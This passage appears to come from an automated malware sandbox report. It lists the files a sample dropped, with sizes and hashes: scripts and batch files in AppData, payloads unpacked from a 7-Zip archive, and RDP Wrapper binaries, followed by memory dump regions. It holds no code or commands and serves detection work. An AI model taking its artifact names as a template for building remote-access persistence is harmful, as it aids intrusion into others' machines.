                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\brutos

                                                              Filesize

                                                              394KB

                                                              MD5

                                                              020ca8399d5809c0d0324133e4b8b1b1

                                                              SHA1

                                                              0ac8b5e0244c45c75daac033da1028b9de551162

                                                              SHA256

                                                              a9aa4bfc661a27fd8df576f9f931ce7889e549ac04d3bbef6f7f9408aa14c5c6

                                                              SHA512

                                                              1023e9724fdb2aa00b5ee41c2b537d784cae90dbc761cfd0202e388ceb7272ab98be3bae324cada2ebe739692216f2967d65433486227c950419d0420802fe08

                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dera

                                                              Filesize

                                                              564KB

                                                              MD5

                                                              7042c42ab11714412914232b8aca6487

                                                              SHA1

                                                              fbdbaba75d22e47214312c5357848f00fbd17ea2

                                                              SHA256

                                                              5fb9b33be8bfeefb598d25b9bfdb4c5c1fba0f99bd14d3c2963ab5de183c3a02

                                                              SHA512

                                                              fdcaf5242aa1e6b47ccf6b28c3039bc66de6a13c08217fc4e72ab286badd5a1837ac6870f22e700c98143118a4810a08d1d86be8f3f7031e69bc9b5dcb6b1c5d

                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\deras

                                                              Filesize

                                                              410KB

                                                              MD5

                                                              76f84f6090c115e35b4e170f2fb47a9a

                                                              SHA1

                                                              85b23daf1b5a2ad43e54c03f4bd2eec701abd6e2

                                                              SHA256

                                                              8935bdab7e61ec529e2cac9ded1190433d2ec4784bbe2724fd3665d193ddafd4

                                                              SHA512

                                                              86fba86dc7ffbee71c9647289524b06d551492e45ce31bd3cf1b0ef12f8d4e3a7644dc06d3b1ec1583c2238316c4b73fe326d4f6b6042a543d1cd61575038e5f

                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com

                                                              Filesize

                                                              872KB

                                                              MD5

                                                              c56b5f0201a3b3de53e561fe76912bfd

                                                              SHA1

                                                              2a4062e10a5de813f5688221dbeb3f3ff33eb417

                                                              SHA256

                                                              237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

                                                              SHA512

                                                              195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\gogrF.exe

                                                              Filesize

                                                              1.8MB

                                                              MD5

                                                              17e2cb0d15de28e402662a9ee7af2b87

                                                              SHA1

                                                              1c10cdcd7c4359aa1b35ec4ce12fd42bedb1a1a9

                                                              SHA256

                                                              b0369d44fb6aa6601968f8cc2c5e948495673043334f89256a0ab784f29c5621

                                                              SHA512

                                                              9216342f4bddf0bb8b9a5c8b9523203a0f0c97f07e6327cd688cf55c4a38972b421f1f248f83bbdf256ded9f465a3e82afa537a7c785cc0812ce789651d58444

                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\sfera

                                                              Filesize

                                                              577KB

                                                              MD5

                                                              4276f85d94bfc0401a32dd4119d8269b

                                                              SHA1

                                                              28c8b34aa1e02814ea41abe73dc57fb33786a9d6

                                                              SHA256

                                                              c11a11e949b86148708d59fbbb5bb0bcdbb6c07b96cd90a028fac5a6a814698b

                                                              SHA512

                                                              7de9a9e003c3f6cb6e824a61963de7962634d8cda54015ffe1c0d46c79e2546e6286a75460d64f540905e1019bd538909e670877e030d2269619fe7edc5dfd0a

                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\sferas

                                                              Filesize

                                                              420KB

                                                              MD5

                                                              cfe03a0d90005edbb9302a43fe66efae

                                                              SHA1

                                                              0dbc9b31d86eb4f66e96c1d68e72e2553a5a8ffc

                                                              SHA256

                                                              bd42c6ee6346e9d78e9d804f739cf04db9284a9b79180b7940bdc60deb1ae5a4

                                                              SHA512

                                                              1788559a23b8b109c0291e7198cd52e2ff13eeaafb0ffe8a8a241ec93f9286faa62fdd1ee237c398084d1629f1bf635055a4648702f39fd6606596156979ec6b

                                                            • C:\Users\Admin\AppData\Local\Temp\Cab5543.tmp

                                                              Filesize

                                                              70KB

                                                              MD5

                                                              49aebf8cbd62d92ac215b2923fb1b9f5

                                                              SHA1

                                                              1723be06719828dda65ad804298d0431f6aff976

                                                              SHA256

                                                              b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

                                                              SHA512

                                                              bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

                                                            • C:\Users\Admin\AppData\Local\Temp\Tar5556.tmp

                                                              Filesize

                                                              181KB

                                                              MD5

                                                              4ea6026cf93ec6338144661bf1202cd1

                                                              SHA1

                                                              a1dec9044f750ad887935a01430bf49322fbdcb7

                                                              SHA256

                                                              8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

                                                              SHA512

                                                              6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

                                                            • C:\Users\Admin\AppData\Roaming\CLNT.vbs

                                                              Filesize

                                                              2KB

                                                              MD5

                                                              e2412243518e6670139e6a1ab6f86a11

                                                              SHA1

                                                              b5b55e61279bfea17414d17af75dd6800ffb97c6

                                                              SHA256

                                                              ddf634c6f7197af3255caf94af3c986ed7348e7efd508274075cb36254fc8762

                                                              SHA512

                                                              3d0289054ea2355d923da7f6cda0f52015808d73c73910a7145efff80636788dc99c12382ed5f6d25dc299a5be0222deed46a8018c83c6c2852072e4af6e62c6

                                                            • C:\Users\Admin\AppData\Roaming\KfFhiFEm.bat

                                                              Filesize

                                                              1KB

                                                              MD5

                                                              5ff23e46d99aea2886555651887a5f1b

                                                              SHA1

                                                              a8dabb15f3834317e1b8ff8b4675dccb672eb55b

                                                              SHA256

                                                              0629895c6da5fb4a09b0832214572c7c6d5058be6f29c3f6061bd0ad428794cf

                                                              SHA512

                                                              5cfd167c876b1be893ec037515c1e36adfe3d78ac51186b262f57499b2acb026d7201debf18c84c66a8f3d98df3558536d99100ab2da442669c2a367d945b5be

                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FG22KLT6XWV9V9SXAMTR.temp

                                                              Filesize

                                                              7KB

                                                              MD5

                                                              47bd771c86416c685e98910eac3c88d0

                                                              SHA1

                                                              191e225474381b5cd590b8ca04c32ce0a08bb9d2

                                                              SHA256

                                                              3e3227861f101f7ac35dcc0fc5b1c94ebe7552a84651dd29c13ac49cce7d37b3

                                                              SHA512

                                                              714666c43b438074d412b066654fd44c116b5e679457d6885d66c61883e35f45cbf5cf0734b23b97d16bbf0fb6cb122745291780ef4b52404063c5e7f4e287ce

                                                            • C:\Users\Admin\AppData\Roaming\OwDsV.vbs

                                                              Filesize

                                                              4KB

                                                              MD5

                                                              0ce9c2c01d781e4a0fcf2be7c18df9b5

                                                              SHA1

                                                              37a8fe63332b0d96be6855692048f4509f7fdc48

                                                              SHA256

                                                              c01364b56cb8008a431239a9a70a041c81b177fa4f0b257fb4a8573110daaf4c

                                                              SHA512

                                                              4cd537ac76ff4c93f84354b21f3dbc2b7e7deea8e695a28363bcf28a2aead439fbabd5ea6a268b115aa7f7ed1c0c17219383af8aaab3dcc39fa4e8d9f075c413

                                                            • C:\Users\Admin\AppData\Roaming\aYOPKyHNFQ.bat

                                                              Filesize

                                                              1KB

                                                              MD5

                                                              fd5bdb9de205580a5b1cbbee5a115c93

                                                              SHA1

                                                              aca041af337daea9a28292a0bc47ddf65de924a0

                                                              SHA256

                                                              0ba027251fdc179b19f9dafb9514da691256f22468764d33c6c275e3e2f8580f

                                                              SHA512

                                                              0ea8e2d6d7e1a5ff567070ae1173197bbd8ee6fd131e5d5492b9763769995843833fc08c433de5c0018bae626fd4e082e2640610c5c1d8e00163bc5f5bcc711d

                                                            • C:\Users\Admin\AppData\Roaming\ieql.vbs

                                                              Filesize

                                                              2KB

                                                              MD5

                                                              193242114c1738d0ea04aa93659fdd5a

                                                              SHA1

                                                              a929cc1cfbe44ba8a99117dfd7819776ab45d465

                                                              SHA256

                                                              c879379224bc8dc4a4f495f989711714a936892b11e7a1cf6e7b79654dc8f928

                                                              SHA512

                                                              46825c3cc42c3c2e86a3890b29b3a2cf9b30e892d0d38bfb2e3334ffa3951b8f732b2786bdffa528ee6ff05c789c35e963f069d54680c3e16735165072e6fec4

                                                            • C:\Users\Admin\AppData\Roaming\jJF.dll

                                                              Filesize

                                                              927B

                                                              MD5

                                                              3881787870694df47afe9bb3619f735e

                                                              SHA1

                                                              8acafdeba3ba1e1420ae84447ff02dfe3b187124

                                                              SHA256

                                                              554c290a7739bf67f60f867c51b58472ccb2bf98e78f7300c139b02de0a139a5

                                                              SHA512

                                                              87a32557de46cb4a25091e4aefe8f02c552162d163559d84dcb3c5aeca62a87e9da90614d6c8848951db8b9bc6717bce5af57c53a27cf2168572ea9ed808b55d

                                                            • C:\Users\Admin\AppData\Roaming\jJF.dll

                                                              Filesize

                                                              923B

                                                              MD5

                                                              186776970b2ee5ca4352a53b20e2f21c

                                                              SHA1

                                                              2ffeaf1f95748a9d0496c378ac0a40ca15518233

                                                              SHA256

                                                              a1d443766374f39776ff191fb86cf802e41091e0f161803a904dfee4bdc00a36

                                                              SHA512

                                                              879761172682aa095a55404e90cde86602342f4b78ae95d3cb1ef81ccac4dd64894d143f3d471110fafed33ea7e9f4dff2343e8201057191c042f3b9a5e0235a

                                                            • C:\Windows\System32\catroot2\edb.log

                                                              Filesize

                                                              64KB

                                                              MD5

                                                              80cc04587686785162ff673ba6511483

                                                              SHA1

                                                              ac23d39515d2bf17dae5f1ef6ae5505e38f31398

                                                              SHA256

                                                              fabc6c6b706a439d1b4f1697891bfd5edf21d59649f35dc868f1e7204cff611b

                                                              SHA512

                                                              ae7bf2ac332cc9a3fba6164992cb3b6ee41f2743b1e6d1d9bff405819164d97526970d006e9ae3663bdc7901875d4421115ebde3447ab377fb4085096ac7b8c7

                                                            • C:\Windows\System32\null

                                                              Filesize

                                                              1KB

                                                              MD5

                                                              9a09d8e6794b47d40c8bf8f91e0cd4b4

                                                              SHA1

                                                              f47086004a03a508585c63571beee963e1b4dfb8

                                                              SHA256

                                                              4a6aba17fc23aaa042e71febe17da1955a2eb8550be965fda455601690a4cb15

                                                              SHA512

                                                              a61a1a424d9ded322b5313a01c10df1fe431d7ba61cebee64b0c6c79e9a2cf4c19f2ce9475a13ecd16cab8b34c5f6d19c564ca345f3f0d9daa13180722b6bebf

                                                            • C:\Windows\System32\null

                                                              Filesize

                                                              1KB

                                                              MD5

                                                              bb635f66e1adedd1c2c127c348c3dd13

                                                              SHA1

                                                              73939555bca882af7879c045ab15518e8dd634fc

                                                              SHA256

                                                              b8afacac814e7c113948b5a7d1f4eaf96e1bf599f04375d604338b2c0f1cee6b

                                                              SHA512

                                                              393d91ef094e89497baab8dcee044f0d775829ca2ad5663032894eb4073ddf71ebf6a8003553df2103f3b56a3330b2595d4a02f170af0ce13252876283772e8e

                                                            • \Program Files\RDP Wrapper\RDPWInst.exe

                                                              Filesize

                                                              1.4MB

                                                              MD5

                                                              3288c284561055044c489567fd630ac2

                                                              SHA1

                                                              11ffeabbe42159e1365aa82463d8690c845ce7b7

                                                              SHA256

                                                              ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753

                                                              SHA512

                                                              c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02

                                                            • \Program Files\RDP Wrapper\rdpwrap.dll

                                                              Filesize

                                                              114KB

                                                              MD5

                                                              461ade40b800ae80a40985594e1ac236

                                                              SHA1

                                                              b3892eef846c044a2b0785d54a432b3e93a968c8

                                                              SHA256

                                                              798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4

                                                              SHA512

                                                              421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

                                                            • \Users\Admin\AppData\Local\Temp\7ZipSfx.000\err.exe

                                                              Filesize

                                                              42KB

                                                              MD5

                                                              38bb4505707fdc7e45266cdc81c0544a

                                                              SHA1

                                                              27474c9b0d555ab4f10ee1445a917d4e947a4538

                                                              SHA256

                                                              2520a93fe9530212b2a49e1b131bf7ac273cf6b90950cefa0e60b4c962868dc4

                                                              SHA512

                                                              e34ff3fe10593e70e44b131a9a8274994ffd07462e6764d5fcd18e1b6bec89a577783d8f1c3481b5c3a098f8c282c03b282506dd805fe06d7c79644898773159

                                                            • memory/992-307-0x0000000000400000-0x000000000056F000-memory.dmp

                                                              Filesize

                                                              1.4MB

                                                            • memory/1540-334-0x000000001B560000-0x000000001B842000-memory.dmp

                                                              Filesize

                                                              2.9MB

                                                            • memory/1540-335-0x0000000002A60000-0x0000000002A68000-memory.dmp

                                                              Filesize

                                                              32KB

                                                            • memory/1568-289-0x0000000000CE0000-0x0000000000CE1000-memory.dmp

                                                              Filesize

                                                              4KB

                                                            • memory/1568-302-0x0000000001360000-0x0000000001361000-memory.dmp

                                                              Filesize

                                                              4KB

                                                            • memory/1568-255-0x0000000000DB0000-0x0000000000DC0000-memory.dmp

                                                              Filesize

                                                              64KB

                                                            • memory/1568-249-0x0000000000BF0000-0x0000000000C00000-memory.dmp

                                                              Filesize

                                                              64KB

                                                            • memory/1568-268-0x0000000000E20000-0x0000000000E21000-memory.dmp

                                                              Filesize

                                                              4KB

                                                            • memory/1568-270-0x0000000000E50000-0x0000000000E51000-memory.dmp

                                                              Filesize

                                                              4KB

                                                            • memory/1568-277-0x0000000000EC0000-0x0000000000EC1000-memory.dmp

                                                              Filesize

                                                              4KB

                                                            • memory/1568-284-0x0000000000E80000-0x0000000000E81000-memory.dmp

                                                              Filesize

                                                              4KB

                                                            • memory/1568-287-0x0000000000D20000-0x0000000000D21000-memory.dmp

                                                              Filesize

                                                              4KB

                                                            • memory/1568-298-0x0000000000D00000-0x0000000000D01000-memory.dmp

                                                              Filesize

                                                              4KB

                                                            • memory/1592-128-0x0000000000400000-0x000000000056F000-memory.dmp

                                                              Filesize

                                                              1.4MB

                                                            • memory/2064-191-0x0000000000400000-0x000000000056F000-memory.dmp

                                                              Filesize

                                                              1.4MB

                                                            • memory/2116-104-0x0000000000400000-0x0000000000412000-memory.dmp

                                                              Filesize

                                                              72KB

                                                            • memory/2444-58-0x0000000000080000-0x00000000000E7000-memory.dmp

                                                              Filesize

                                                              412KB

                                                            • memory/2444-63-0x0000000000080000-0x00000000000E7000-memory.dmp

                                                              Filesize

                                                              412KB

                                                            • memory/2444-61-0x0000000000080000-0x00000000000E7000-memory.dmp

                                                              Filesize

                                                              412KB

                                                            • memory/2500-360-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

                                                              Filesize

                                                              2.9MB

                                                            • memory/2500-361-0x00000000020D0000-0x00000000020D8000-memory.dmp

                                                              Filesize

                                                              32KB

                                                            • memory/3000-65-0x0000000000080000-0x00000000000A0000-memory.dmp

                                                              Filesize

                                                              128KB

                                                            • memory/3000-54-0x0000000000080000-0x00000000000A0000-memory.dmp

                                                              Filesize

                                                              128KB

                                                            • memory/3000-56-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

                                                              Filesize

                                                              4KB

                                                            • memory/3000-57-0x0000000000080000-0x00000000000A0000-memory.dmp

                                                              Filesize

                                                              128KB

                                                            • memory/3036-186-0x0000000000400000-0x000000000056F000-memory.dmp

                                                              Filesize

                                                              1.4MB